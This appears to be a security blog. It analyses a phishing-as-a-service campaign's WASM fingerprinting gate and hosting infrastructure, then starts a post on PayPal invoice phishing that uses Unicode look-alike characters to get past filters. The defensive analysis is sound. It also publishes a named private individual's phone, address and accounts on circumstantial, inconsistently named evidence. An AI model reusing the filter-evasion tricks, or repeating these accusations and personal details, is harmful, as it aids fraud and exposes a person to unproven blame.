wasm-bindgen-futures 0.4.50: provides support for asynchronous operations in the browser, such as JavaScript promises
web-sys 0.3.77: gives Rust access to standard web APIs, including window, navigator, and document
futures-util 0.3.31: a helper library for working with asynchronous tasks in Rust

This metadata shows how the WASM module was built and what runtime features it could access in the browser.

What the WASM Does

The WebAssembly module is the core fingerprinting engine. Its internal code is not visible, but its interface shows what data it collects from the browser and device.

Fingerprint Dataset

Screen Data:

width, height
availWidth, availHeight
colorDepth, pixelDepth
orientation
screenX, screenY

Window Data

innerWidth, innerHeight
outerWidth, outerHeight
pageXOffset, pageYOffset
devicePixelRatio

Navigator Data

userAgent
platform
language
languages
plugins
mimeTypes
deviceMemory
hardwareConcurrency
maxTouchPoints
permissions

WebGL GPU Data

vendor
renderer
WebGL version

Automation / VM Detection

TouchEvent presence
ontouchstart
automation frameworks
VM artifacts

Permissions Checked

accelerometer
ambient-light-sensor
background-fetch
background-sync
bluetooth
camera
clipboard
device-info
display-capture
gamepad
geolocation
gyroscope
magnetometer
microphone
midi
nfc
notifications
persistent-storage
push
screen-wake-lock
speaker
speaker-selection

Screen Orientation Values

portrait-primary
portrait-secondary
landscape-primary
landscape-secondary

Exfiltration Logic

After all fingerprint fields are collected and combined into a unique visitor ID, the WASM module prepares the data for exfiltration.

It creates a hidden HTML form through its DOM bindings, sets the form’s method to POST, and silently submits it, sending the full fingerprint to the attacker’s server without any visible activity.

The server then determines the outcome:

If the device appears to belong to a real user, the victim is forwarded to the phishing login page.
If analysis tools, automation, or other anomalies are detected, the visitor is redirected to the BBC homepage to avoid raising suspicion.

Further testing could have included supplying a real victim ID and emulating a clean environment to reach the phishing page. However, doing so would have caused the attacker’s system to record that victim as an active clicker, potentially escalating the attack against them. To avoid that, testing stops here.

Attribution Assessment

Now that we’ve uncovered the technical aspects of this campaign, we need to look at who is running it and why.

The change in the complexity of the code and the difference in domain registration details across the three pages suggest a classic division of labor consistent with the Phishing-as-a-Service (PaaS) business model:

Affiliate (The Customer): The initial, less complex pages were likely managed by the Affiliate. Their job is to create the initial lure, purchase the first domain, and send the spam/phishing emails to drive traffic. They pay the platform a fee and handle the initial traffic generation.
PaaS Provider (The Infrastructure): The third page, containing the highly protected WebAssembly (WASM) code and sophisticated validation logic, leads directly to the PaaS Provider’s infrastructure. The provider handles the technical heavy lifting: hosting the secure, anti-analysis gatekeeper, running the victim validation checks, and delivering the final phishing payload. They protect their platform fiercely, which is why the code was so heavily obfuscated.

This means we are not just looking for the scammer; we are now investigating the highly technical organization that built the defense and validation system.

Tracking the Infrastructure Behind the Campaign

In this phase, we use tools such as WHOIS and DIG to investigate domain registration and hosting records. The goal is to identify evidence that could reveal who is behind the attack.

We focus on operational security mistakes, looking for details such as email addresses, registration names, or physical locations that could link multiple components of the criminal network together.

Domain #1 (PaaS Affiliate)

eduhealthconnect.com
ssologon.eduhealthconnect.com

Whois - Primary Domain

Our first step is to execute a WHOIS search on the main domain to expose the identity of the person or entity responsible for the registration.

whois -h whois.crazydomains.com eduhealthconnect.com

Domain Name: EDUHEALTHCONNECT.COM
Registry Domain ID: 2670481451_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.syrahost.com
Registrar URL: http://www.crazydomains.com
Updated Date: 2025-03-30T00:00:00Z
Creation Date: 2022-01-24T00:00:00Z
Registrar Registration Expiration Date: 2026-01-24T00:00:00Z
Registrar: Dreamscape Networks International Pte Ltd
Registrar IANA ID: 1291
Registrar Abuse Contact Email: abuse@dreamscapenetworks.com
Registrar Abuse Contact Phone: +65.69147880
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: R-028391584-SN
Registrant Name: Santosh Kumar
Registrant Organization: 
Registrant Street: LOWERWARDMAN COMPOUND LALPUE
Registrant City: RANCHI
Registrant State/Province: JHARKHAND
Registrant Postal Code: 834001
Registrant Country: IN
Registrant Phone: +91.9973380119
Registrant Phone Ext: 
Registrant Email: CEEONLINESMS@GMAIL.COM
Name Server: NS1.HOSTING4WEBS.COM
Name Server: NS2.HOSTING4WEBS.COM
DNSSEC: unsigned

The WHOIS data confirms the domain is registered to an individual named Santosh Kumar in Jharkhand, India, and explicitly links him to an email address containing “CEEONLINESMS,” which we’ll look at in more detail in a later section.

All DNS Records

Next, we queried the Domain Name System (DNS) records to identify the main servers hosting the domain and the external services authorized to send email on its behalf.

for type in A NS MX TXT SOA; do dig eduhealthconnect.com $type +short; done
162.19.61.190
ns2.hosting4webs.com.
ns1.hosting4webs.com.
0 eduhealthconnect.com.
“v=spf1 ip4:162.19.61.190 ip4:51.210.113.204 +a +mx +ip4:173.208.234.202 ~all”
ns1.hosting4webs.com. a.s.l. 2025120400 3600 7200 1209600 86400

The DNS records show the main server is hosted by OVH SAS in France, while the SPF records authorize two additional, high-volume mail relays: one also on OVH and another on WholeSale Internet in the US.

Whois - Primary Domain Email Servers

To understand the nature of the network infrastructure, we must perform WHOIS checks on the IP addresses identified in the DNS records.

whois -h whois.ripe.net 51.210.113.204
inetnum:        51.210.113.0 - 51.210.113.255
netname:        rbx8-sdagg1a-n93-2-2
country:        FR
org:            ORG-OS3-RIPE
geoloc:         50.693434 3.199826
admin-c:        OTC2-RIPE
tech-c:         OTC2-RIPE
status:         LEGACY
mnt-by:         OVH-MNT
created:        2020-05-25T12:32:57Z
last-modified:  2020-05-25T12:32:57Z
source:         RIPE

organisation:   ORG-OS3-RIPE
org-name:       OVH SAS
country:        FR
org-type:       LIR
address:        2 rue Kellermann
address:        59100
address:        Roubaix
address:        FRANCE
phone:          +33972101007
admin-c:        OTC2-RIPE
admin-c:        OK217-RIPE
admin-c:        TLB55-RIPE
abuse-c:        AR15333-RIPE
mnt-ref:        OVH-MNT
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         OVH-MNT
created:        2004-04-17T11:23:17Z
last-modified:  2025-09-17T09:23:15Z
source:         RIPE # Filtered

role:           OVH Technical Contact
address:        OVH SAS
address:        2 rue Kellermann
address:        59100 Roubaix
address:        France
admin-c:        OK217-RIPE
tech-c:         GM84-RIPE
tech-c:         SL10162-RIPE
nic-hdl:        OTC2-RIPE
abuse-mailbox:  abuse@ovh.net
mnt-by:         OVH-MNT
created:        2004-01-28T17:42:29Z
last-modified:  2014-09-05T10:47:15Z
source:         RIPE # Filtered

% Information related to ‘51.210.0.0/16AS16276’

route:          51.210.0.0/16
origin:         AS16276
mnt-by:         OVH-MNT
created:        2020-04-09T10:18:04Z
last-modified:  2020-04-09T10:18:04Z
source:         RIPE

whois -h whois.arin.net 173.208.234.202
NetRange:       173.208.128.0 - 173.208.255.255
CIDR:           173.208.128.0/17
NetName:        WII-NET-173-208
NetHandle:      NET-173-208-128-0-1
Parent:         NET173 (NET-173-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       
Organization:   WholeSale Internet, Inc. (WHOLE-125)
RegDate:        2009-12-17
Updated:        2018-04-10
Comment:        http://www.wholesaleinternet.net
Ref:            https://rdap.arin.net/registry/ip/173.208.128.0


OrgName:        WholeSale Internet, Inc.
OrgId:          WHOLE-125
Address:        201 East 16th Ave
City:           North Kansas City
StateProv:      MO
PostalCode:     64116
Country:        US
RegDate:        2003-09-24
Updated:        2023-10-27
Comment:        http://www.wholesaleinternet.net
Ref:            https://rdap.arin.net/registry/entity/WHOLE-125


OrgAbuseHandle: NETWO1111-ARIN
OrgAbuseName:   Network Security
OrgAbusePhone:  +1-816-256-3031 
OrgAbuseEmail:  abuse@nocix.net
OrgAbuseRef:    https://rdap.arin.net/registry/entity/NETWO1111-ARIN

OrgTechHandle: AWE13-ARIN
OrgTechName:   Wendel, Aaron 
OrgTechPhone:  +1-816-256-3031 
OrgTechEmail:  aaron@nocix.net
OrgTechRef:    https://rdap.arin.net/registry/entity/AWE13-ARIN

OrgTechHandle: KRH22-ARIN
OrgTechName:   HODLE, Kevin Robert
OrgTechPhone:  +1-816-506-2605 
OrgTechEmail:  kevin@wholesaleinternet.net
OrgTechRef:    https://rdap.arin.net/registry/entity/KRH22-ARIN

OrgTechHandle: KAISE102-ARIN
OrgTechName:   kaiser, rebecca 
OrgTechPhone:  +1-816-256-3031 
OrgTechEmail:  rebecca@nocix.net
OrgTechRef:    https://rdap.arin.net/registry/entity/KAISE102-ARIN

OrgTechHandle: REGIO-ARIN
OrgTechName:   Region, Bob 
OrgTechPhone:  +1-816-256-3031 
OrgTechEmail:  bob@wholesaleinternet.net
OrgTechRef:    https://rdap.arin.net/registry/entity/REGIO-ARIN

RNOCHandle: NETWO1112-ARIN
RNOCName:   Network Operations
RNOCPhone:  +1-816-256-3031 
RNOCEmail:  admin@wholesaleinternet.net
RNOCRef:    https://rdap.arin.net/registry/entity/NETWO1112-ARIN

RTechHandle: NETWO1112-ARIN
RTechName:   Network Operations
RTechPhone:  +1-816-256-3031 
RTechEmail:  admin@wholesaleinternet.net
RTechRef:    https://rdap.arin.net/registry/entity/NETWO1112-ARIN

RAbuseHandle: NETWO1111-ARIN
RAbuseName:   Network Security
RAbusePhone:  +1-816-256-3031 
RAbuseEmail:  abuse@nocix.net
RAbuseRef:    https://rdap.arin.net/registry/entity/NETWO1111-ARIN

Whois - Primary Server URL

whois -h whois.ripe.net 162.19.61.190

inetnum:        162.19.61.0 - 162.19.61.255
netname:        SD-RBX8-SDAGG-37A-B-1-2
country:        FR
org:            ORG-OS3-RIPE
geoloc:         50.693434 3.199826
admin-c:        OTC2-RIPE
tech-c:         OTC2-RIPE
status:         LEGACY
mnt-by:         OVH-MNT
created:        2022-05-03T12:21:49Z
last-modified:  2022-05-03T12:21:49Z
source:         RIPE

organisation:   ORG-OS3-RIPE
org-name:       OVH SAS
country:        FR
org-type:       LIR
address:        2 rue Kellermann
address:        59100
address:        Roubaix
address:        FRANCE
phone:          +33972101007
admin-c:        OTC2-RIPE
admin-c:        OK217-RIPE
admin-c:        TLB55-RIPE
abuse-c:        AR15333-RIPE
mnt-ref:        OVH-MNT
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         OVH-MNT
created:        2004-04-17T11:23:17Z
last-modified:  2025-09-17T09:23:15Z
source:         RIPE # Filtered

role:           OVH Technical Contact
address:        OVH SAS
address:        2 rue Kellermann
address:        59100 Roubaix
address:        France
admin-c:        OK217-RIPE
tech-c:         GM84-RIPE
tech-c:         SL10162-RIPE
nic-hdl:        OTC2-RIPE
abuse-mailbox:  abuse@ovh.net
mnt-by:         OVH-MNT
created:        2004-01-28T17:42:29Z
last-modified:  2014-09-05T10:47:15Z
source:         RIPE # Filtered

% Information related to ‘162.19.0.0/17AS16276’

route:          162.19.0.0/17
origin:         AS16276
mnt-by:         OVH-MNT
created:        2022-01-20T09:36:09Z
last-modified:  2022-01-20T09:36:09Z
source:         RIPE

The IP checks confirms the main server (162.19.61.190) is allocated to OVH SAS in France, and the two authorized email relay IPs are allocated to OVH SAS and WholeSale Internet, Inc. in North Kansas City, Missouri, showing the operator has deliberately set up a network of geographically diverse, high-volume hosting providers to facilitate their activity.

Dig - Phishing Subdomain

We now isolate the specific subdomain that hosted the malicious content to determine if the attacker segregated their infrastructure for the core attack component.

dig ssologon.eduhealthconnect.com A +short
172.245.112.206

The ssologon subdomain reveals a different IP address (172.245.112.206), confirming that the malicious page is hosted on a separate machine from the primary domain, a tactic used to protect the root domain from takedown.

Whois - Phishing Subdomain IP

Our final step for this domain is to run a WHOIS check on the new IP address to identify the hosting provider for the malicious component.

whois -h whois.arin.net 172.245.112.206
NetRange:       172.245.0.0 - 172.245.255.255
CIDR:           172.245.0.0/16
NetName:        CC-14
NetHandle:      NET-172-245-0-0-1
Parent:         NET172 (NET-172-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       
Organization:   HostPapa (HOSTP-7)
RegDate:        2013-04-22
Updated:        2024-02-02
Comment:        Geofeed https://geofeeds.oniaas.io/geofeeds.csv
Ref:            https://rdap.arin.net/registry/ip/172.245.0.0



OrgName:        HostPapa
OrgId:          HOSTP-7
Address:        325 Delaware Avenue
Address:        Suite 300
City:           Buffalo
StateProv:      NY
PostalCode:     14202
Country:        US
RegDate:        2016-06-06
Updated:        2025-10-05
Ref:            https://rdap.arin.net/registry/entity/HOSTP-7


OrgAbuseHandle: NETAB23-ARIN
OrgAbuseName:   NETABUSE
OrgAbusePhone:  +1-905-315-3455 
OrgAbuseEmail:  net-abuse-global@hostpapa.com
OrgAbuseRef:    https://rdap.arin.net/registry/entity/NETAB23-ARIN

OrgTechHandle: NETTE9-ARIN
OrgTechName:   NETTECH
OrgTechPhone:  +1-905-315-3455 
OrgTechEmail:  net-tech-global@hostpapa.com
OrgTechRef:    https://rdap.arin.net/registry/entity/NETTE9-ARIN

RAbuseHandle: NETAB27-ARIN
RAbuseName:   NETABUSE-COLOCROSSING
RAbusePhone:  +1-800-518-9716 
RAbuseEmail:  abuse@colocrossing.com
RAbuseRef:    https://rdap.arin.net/registry/entity/NETAB27-ARIN

RTechHandle: NETTE11-ARIN
RTechName:   NETTECH-COLOCROSSING
RTechPhone:  +1-800-518-9716 
RTechEmail:  support@colocrossing.com
RTechRef:    https://rdap.arin.net/registry/entity/NETTE11-ARIN

The IP check shows the phishing subdomain is hosted by HostPapa via the Colocrossing backbone in Buffalo, New York, confirming the Affiliate utilizes a third-party hosting company known for high-volume, abuse-tolerant services to host the critical attack page.

OSINT Report: CeeOnlineSMS

The WHOIS report for the first phishing page, which was received in the phishing email containts the informatin of the following individual:

Name: Abhay Singh
Identified via: Instagram and WordPress blog posts (signed as abhayceeonline).
Confirmed Association: The Instagram profile is @ceeonlinesms.

1. Factual Identity Convergence

The registrant email address, CEEONLINESMS@GMAIL.COM, is directly tied to the individual Abhay Singh through multiple sources:

Shared Naming Convention: The individual’s name, Abhay Singh, is featured in the Instagram handle (@ceeonlinesms) and the WordPress blog posts (Posted by abhayceeonline).
Business Registration: The same ‘CEEONLINE’ branding is used for the Facebook page, CEEONLINE ENTERPRISES, which provides a physical address, phone number, and linked domains, forming a cohesive business profile.
Cross-Platform Consistency: The primary username/handle, ceeonline, is consistently used across Bitcointalk, Discord, and Telegram, reinforcing the identity of the person behind the enterprise.

2. High-Risk Service Offerings

The core services advertised by CEEONLINE ENTERPRISES facilitate key components required for large-scale malicious campaigns, including phishing:

Bulk SMS Messaging: The enterprise’s primary business, as documented on the WordPress blog, is the sale of high-volume Promotional and Transactional Bulk SMS Packages. This service is essential for any SMS phishing (smishing) operation targeting a large number of victims.
Associated Domains: The linked domains, ceeonlinehost.com and ceeonlinesms.in, suggest the offering of both SMS services and web hosting services. Web hosting can be utilized to host the deceptive landing pages or phishing kit files needed to harvest victim credentials.
Phishing Prerequisites: Bulk messaging and web hosting are the two fundamental infrastructural requirements for executing a phishing scheme, establishing a strong potential for involvement.

3. Interest in Online Schemes

Activity on the Bitcointalk forum, where the individual uses the username ceeonline, shows engagement with a cryptocurrency bounty/lottery scheme.

This demonstrates an interest in online money-making or speculative digital asset ventures, aligning with the motive for engaging in or facilitating financially-motivated schemes, such as phishing.

Cryptocurrency, while having legitimate uses, is commonly used to purchase illicit services online (such as Phishing-as-a-Service access) and serves as a de facto currency in the underground hacking and cybercrime economy.

This fact is not conclusive on its own, but when coupled with the other findings like the sale of high-risk services like Bulk SMS, it becomes a strong indicator of the actor’s comfort and involvement in the necessary financial ecosystem for cybercrime.

In summary, the registered contact for EDUHEALTHCONNECT.COM is strongly associated with an online identity, Abhay Singh / CEEONLINE, who operates a business that sells the key infrastructure (Bulk SMS) for phishing campaigns and has displayed an interest in online financial schemes (cryptocurrency bounty).

This individual and the enterprise are a strong link to the underlying activity related to the domain registration.

Business Entity and Contact Information

The services are operated under the name CEEONLINE ENTERPRISES.

Physical Address: Vardhaman Tower, Lalpur, Ranchi, India, Jharkhand
Phone Number: +91 99733 80119
Associated Domains:
- ceeonlinehost.com
- ceeonlinesms.in

Digital Footprint and Linked Accounts

The entity and/or the individual is active across multiple online platforms, often using the handle ceeonline or ceeonlinesms.

# List of Associated Accounts:

Platform: Bitcointalk
Username / Handle: ceeonline
Profile Link: https://bitcointalk.org/index.php?action=profile;u=1774646

Platform: Twitter
Username / Handle: @airdrop1670
Profile Link: https://twitter.com/airdrop1670

Platform: Discord
Username / Handle: ceeonline

Platform: Telegram
Username / Handle: @ceeonlinesms

Platform: Facebook
Page Name: CEEONLINE ENTERPRISES
Profile Link: https://www.facebook.com/p/CEEONLINE-ENTERPRISES-100070322778717/

Platform: Instagram
Username / Handle: @ceeonlinesms

Platform: Wordpress Blog (Posted by Abhay Singh)
Author Handle: abhayceeonline
Blog Link: https://ceeonlinesms.wordpress.com/2013/10/02/cheapest-bulk-sms-service-provider-all-over-india/

The open-source intelligence (OSINT) gathered establishes a strong, multi-layered link between the individual registrant of the domain and a persistent online enterprise that offers services directly applicable to phishing campaigns.

Key Findings (Affiliate):

The forensic evidence establishes a strong association between the initial phishing page and a known online identity, Santosh Kumar / CEEONLINE.

This identity is linked to a business that provides the Bulk SMS infrastructure required for mass-scale phishing. This actor operates using a geographically diverse, high-volume hosting infrastructure (OVH and WholeSale Internet) that is highly consistent with environments optimized for spam and malicious traffic.

This entity is considered the Affiliate responsible for generating traffic and providing the initial lure.

Domain #2 (Phishing as a Service)

We now turn our attention to the second malicious domain, clctz.org, which hosts the core Phishing-as-a-Service (PaaS) kit. This domain exhibits all the hallmarks of a professional, anonymity-focused cybercrime operation.

clctz.org
ssologon.clctz.org
logonacc.ssologon.clctz.org

1. WHOIS Search: Primary Domain

Our initial WHOIS search on the core platform domain is the first step in establishing the operational security posture of the provider.

whois -h whois.namesilo.com clctz.org 

Domain Name: clctz.org
Registrar: NameSilo, LLC
Registrar URL: https://www.namesilo.com/
Updated Date: 2025-09-29T07:00:00Z
Creation Date: 2025-04-04T07:00:00Z
Registrar Registration Expiration Date: 2026-04-04T07:00:00Z
Domain Status: client transfer prohibited
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Registrant Organization: See PrivacyGuardian.org
Registrant Email: pwp-156c9d510b826f6e44c12dfc9082d544@privacyguardian.org
Name Server: CS11.HPCNOC.COM
Name Server: CS12.HPCNOC.COM
DNSSEC: unsigned

The WHOIS data confirms the domain is registered with NameSilo and uses the PrivacyGuardian.org service to fully conceal the operator’s identity, establishing the high priority this actor places on anonymity and evasion from the start.

2. DNS Records: All Records for Domain

Next, we execute a query for all DNS records to identify the main host, the control points, and any external email services authorized by the provider.

for type in A NS MX TXT SOA; do dig clctz.org $type +short; done

178.162.234.23
cs12.hpcnoc.com.
cs11.hpcnoc.com.

0 clctz.org.

“v=spf1 ip4:178.162.234.23 include:relay.mailbaby.net +a +mx +ip4:213.136.76.15 ~all”

cs11.hpcnoc.com. root.rcnoc.com. 2025120500 3600 1800 1209600 86400

The DNS records show the primary server address is 178.162.234.23, and the SPF record authorizes an external service called Mailbaby.net (specifically via IP 213.136.76.15), confirming the operator relies on a dedicated third-party bulk email relay to ensure high deliverability.

3. Reverse DNS Search: Authorized Mail Server IP

To identify the provider responsible for the external bulk mail relay, we perform a reverse DNS lookup on the newly discovered IP address (213.136.76.15) authorized in the SPF record.

dig -x 213.136.76.15

; <<>> DiG 9.10.6 <<>> -x 213.136.76.15
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17361
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;15.76.136.213.in-addr.arpa.	IN	PTR

;; ANSWER SECTION:
15.76.136.213.in-addr.arpa. 86024 IN	PTR	m30015.contaboserver.net.

;; Query time: 95 msec
;; SERVER: 10.2.0.1#53(10.2.0.1)
;; WHEN: Sat Dec 06 19:25:23 PST 2025
;; MSG SIZE  rcvd: 93

The reverse lookup reveals the mail server’s domain is m30015.contaboserver.net, strongly suggesting the server is hosted by Contabo GmbH, a German web hosting and cloud provider.

4. WHOIS Search: Primary Server IP

We now execute a WHOIS check on the primary host IP (178.162.234.23) to identify the network owner and the specific abuse contact required to suspend the root domain’s hosted content.

whois -h whois.ripe.net 178.162.234.23
inetnum:        178.162.234.0 - 178.162.235.255
netname:        Leaseweb
descr:          Leaseweb Deutschland GmbH
remarks:        Please send all abuse notifications to the following email address: abuse@de.leaseweb.com. To ensure proper processing of your abuse notification, please visit the website www.leaseweb.com/abuse for notification requirements. All police and other government agency requests must be sent to subpoenas@de.leaseweb.com.
country:        DE
admin-c:        LSWG-RIPE
tech-c:         LSWG-RIPE
status:         ASSIGNED PA
mnt-by:         LEASEWEB-DE-MNT
mnt-lower:      LEASEWEB-DE-MNT
mnt-routes:     LEASEWEB-DE-MNT
created:        2012-09-04T10:27:36Z
last-modified:  2015-10-01T15:04:44Z
source:         RIPE

person:         RIPE Mann
address:        Kleyerstrasse 75-87
address:        60326 Frankfurt am Main
address:        Germany
phone:          +49 69 2475 2860
fax-no:         +49 69 2475 2861
nic-hdl:        LSWG-RIPE
mnt-by:         LEASEWEB-DE-MNT
created:        2012-03-23T15:55:41Z
last-modified:  2025-07-17T12:58:23Z
source:         RIPE # Filtered

% Information related to ‘178.162.192.0/18AS28753’

route:          178.162.192.0/18
origin:         AS28753
mnt-by:         LEASEWEB-DE-MNT
created:        2016-11-14T07:54:33Z
last-modified:  2016-11-14T07:54:33Z
source:         RIPE

The IP check confirms the primary website is hosted by Leaseweb Deutschland GmbH in Frankfurt, Germany, which provides the official abuse contact necessary for reporting the root domain’s activity.

5. Dig Search: Phishing Subdomains

Our next step is to examine the specific subdomains that serve the malicious code to see if they are segregated from the primary website.

dig ssologon.clctz.org A +short
dig logonacc.ssologon.clctz.org A +short
144.172.108.175
144.172.108.175

The DNS queries show that both malicious subdomains point to a single, dedicated IP address (144.172.108.175), confirming the highly specialized core phishing kit is isolated from the main Leaseweb server.

6. Reverse DNS Search: Phishing Subdomain IP

To identify the hosting company for this specialized phishing kit, we run a reverse DNS lookup on the newly discovered subdomain IP (144.172.108.175).

dig -x 144.172.108.175

; <<>> DiG 9.10.6 <<>> -x 144.172.108.175
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22003
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;175.108.172.144.in-addr.arpa.	IN	PTR

;; ANSWER SECTION:
175.108.172.144.in-addr.arpa. 120 IN	PTR	175.108.172.144.static.cloudzy.com.

The reverse lookup reveals the domain is 175.108.172.144.static.cloudzy.com, indicating the PaaS kit is hosted on a service often linked to “bulletproof” hosting environments.

7. WHOIS Search: Phishing Subdomain IP

Finally, we execute a WHOIS check on the IP to identify the network owner responsible for the specialized hosting of the core phishing kit.

whois -h whois.arin.net 144.172.108.175

NetRange:       144.172.64.0 - 144.172.127.255
CIDR:           144.172.64.0/18
NetName:        PONYNET-12
NetHandle:      NET-144-172-64-0-1
Parent:         NET144 (NET-144-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       
Organization:   FranTech Solutions (SYNDI-5)
RegDate:        2014-05-07
Updated:        2014-05-07
Ref:            https://rdap.arin.net/registry/ip/144.172.64.0


OrgName:        FranTech Solutions
OrgId:          SYNDI-5
Address:        1621 Central Ave
City:           Cheyenne
StateProv:      WY
PostalCode:     82001
Country:        US
RegDate:        2010-07-21
Updated:        2024-11-25
Ref:            https://rdap.arin.net/registry/entity/SYNDI-5


OrgAbuseHandle: FDI19-ARIN
OrgAbuseName:   Dias, Francisco 
OrgAbusePhone:  +1-702-728-8933 
OrgAbuseEmail:  admin@frantech.ca
OrgAbuseRef:    https://rdap.arin.net/registry/entity/FDI19-ARIN

OrgTechHandle: FDI19-ARIN
OrgTechName:   Dias, Francisco 
OrgTechPhone:  +1-702-728-8933 
OrgTechEmail:  admin@frantech.ca
OrgTechRef:    https://rdap.arin.net/registry/entity/FDI19-ARIN

The IP check shows the infrastructure is ultimately allocated to FranTech Solutions in Cheyenne, Wyoming, confirming the PaaS Provider relies on an abuse-tolerant, US-based hosting provider for their most critical asset.

Key Findings (PaaS Provider):

The forensic evidence indicates that the PaaS Provider operates with a singular focus on anonymity and resilience. Their registration practices, utilizing privacy services (PrivacyGuardian.org) and anonymity-friendly registrars (NameSilo), are highly suggestive of a professional operational security posture.

Their infrastructure appears highly specialized, relying on global hosting (Leaseweb, Contabo) for redundancy. They host their core, sophisticated phishing kit on networks (FranTech Solutions/Cloudzy) which are known for being abuse-tolerant.

This separation of function and infrastructure strongly suggests the existence of the PaaS Provider who sells access to their technical platform.

Evidence for Phishing-as-a-Service

The extensive technical differences in the DNS, WHOIS, and infrastructure confirm that the two domains, eduhealthconnect.com and clctz.org, are not operated by the same people.

The evidence points to a classic Phishing-as-a-Service (PaaS) relationship, where one entity is the Affiliate (customer) and the other is the PaaS Provider (operator). Here is a full breakdown of the evidence supporting the Affiliate/PaaS model.

1. Identity and Registration Discrepancies

The WHOIS records for the two domains reveal completely contradictory registration strategies, serving as the strongest initial proof of separate ownership:

Affiliate (eduhealthconnect.com): This domain is explicitly registered to an identifiable individual, Santosh Kumar/Abhay Singh, and the entity CEEONLINE ENTERPRISES. The contact information is directly linked to a business specializing in Bulk communications (SMS and email), which is the service used to launch high-volume phishing attacks. This actor provides the traffic and lure.
PaaS Provider (clctz.org): This domain is fully privacy protected, using a proxy service (PrivacyGuardian.org) and the anonymity-focused registrar NameSilo. This focus on concealment is a trademark of professional malicious service providers who must shield their core product from exposure and takedown.

2. Distinct Infrastructure Footprints

All underlying network components are different for the two domains. If the same group operated both, they would almost certainly reuse some of their infrastructure.

Hosting Providers are Different: The primary host for the Affiliate domain is OVH SAS (France), while the PaaS Provider domain uses Leaseweb (Germany). Crucially, the final phishing page for the Affiliate is hosted by HostPapa (US), while the PaaS Provider’s core kit is hosted on FranTech Solutions/Cloudzy (US). These are separate networks, chosen independently.
Email Services are Different: The SPF records authorize completely separate email services and IP addresses for bulk sending (OVH/WholeSale Internet for the Affiliate versus Mailbaby.net/Contabo GmbH for the Provider).
Name Servers are Different: The domains rely on distinct network operators for DNS resolution (HOSTING4WEBS.COM versus HPCNOC.COM).

3. Phishing Methodology and Shared Tool

The technical similarities, such as the ssologon subdomain structure, actually cement the PaaS relationship by identifying a common tool:

PaaS Kit Signature: The use of the identical and standardized subdomain, ssologon.domain.com, across both domains is the signature of the Phishing-as-a-Service kit itself. This shows the Affiliate is using a tool that forces a specific, pre-built redirection and tracking structure dictated by the operator.
Code Sophistication Divergence: The final landing page code on the Provider’s domain (clctz.org) is a massive, highly sophisticated script featuring WebAssembly (WASM), advanced browser fingerprinting, and multiple layers of anti-analysis defenses. This extreme complexity requires the kind of specialization found in a PaaS Operator, who develops the powerful weapon, while the Affiliate focuses on the simple task of generating traffic.

The overall evidence indicates that the registered individual (eduhealthconnect.com) is a customer/Affiliate who specializes in traffic generation and is paying to use the advanced, anonymous PaaS Platform provided by the operator of clctz.org.

Have you received a phishing email?

Send me a message! I am looking for more samples.

Thanks for reading.

Google Workspace Abuse Leads to Highly Convincing PayPal Phishing Attack

Dark Marc — Thu, 27 Nov 2025 02:21:56 GMT

Imagine this: You open your email in the morning to check what came in overnight. You see an email from PayPal with the subject “Recurring Payment Reactivated.”
Your heart skips a beat. Your stomach drops. You don’t remember starting any subscriptions, so you click the email. You see you’re being charged $1,499 for a purchase you didn’t make.
You start to panic. You know phishing schemes exist, where scammers spoof legitimate email addresses. But when you check the sender, it’s a verified PayPal.com domain, sent directly from PayPal’s system.
Now you in a panic, you wonder: “Has my account been hacked?” The next step many would take is calling the phone number in the email. On the other end, a “helpful” agent pretends to be PayPal, but they are actually a scammer who will steal your account and funds.
This is exactly the situation one of my readers found themselves in.
Fortunately, instead of dialing the number, they noticed a few odd details and forwarded the email to me.
In this post, I will walk through that email step by step, highlight the red flags that show it is a phishing attempt, and explain how the scammer pulled off a scheme that appears to come directly from PayPal itself.
The Phishing Email
Any time you receive a suspicious email, the first step is to inspect the email header. On most email providers, you can do this by clicking the arrow next to the sender’s name and selecting “View Full Header” or “Show Original.”
Scammers often spoof the sender’s address. When this happens, the email usually ends up in the spam folder because the domain is not properly verified. Sometimes scammers register domains that look very similar to legitimate ones, such as rnicrosoft.com instead of microsoft.com.
In this case, however, the sender domain is a real, verified PayPal domain, indicated by the blue checkmark next to the sender in Gmail. This means the email was actually sent from PayPal’s system, which makes it much more convincing and harder to detect as a scam.
Red Flag #1: Email Sent to the Wrong Address
The first red flag is that the email was sent to receipt10@aldiscover.feedback, an address that does not belong to the person who received it. This is a technical trick used by the scammers to forward emails without the recipient realizing it, which I will explain later in the article.
Red Flag #2: Form Field Mismatch
Scammers can manipulate PayPal’s merchant forms to insert fraudulent information in fields where it doesn’t belong. In this case, they used the Customer Service URL field to include a scam phone number and misleading instructions, taking advantage of the system’s weak validation.
In the Customer Service URL field, the scammer included a valid URL to pass PayPal’s form validation, which requires a proper URL in the field.
However, the system does not check for extra text appended after the URL, and this is where the scammer inserted their malicious message.
They also used tricks to bypass PayPal’s filters, which normally block words like “PayPal” and “Support”, as well as dollar amounts and phone numbers.
The text looks like this:
Payment of $ 𝟭𝟰𝟵𝟵.𝟰𝟵 has been successfully processed.For cancel⠀and⠀Refund, Contact 𝐏ayPal 𝗦upport at (𝟴𝟬𝟱) 𝟱𝟬𝟬-𝟲𝟯𝟳𝟳
To a human reader, it looks normal, but the scammer replaced several characters with look-alike characters that are treated differently by filters and security systems.
Dollar amount:
The digits in the amount were replaced with stylized Unicode digits.
1 became 𝟭
4 became 𝟰
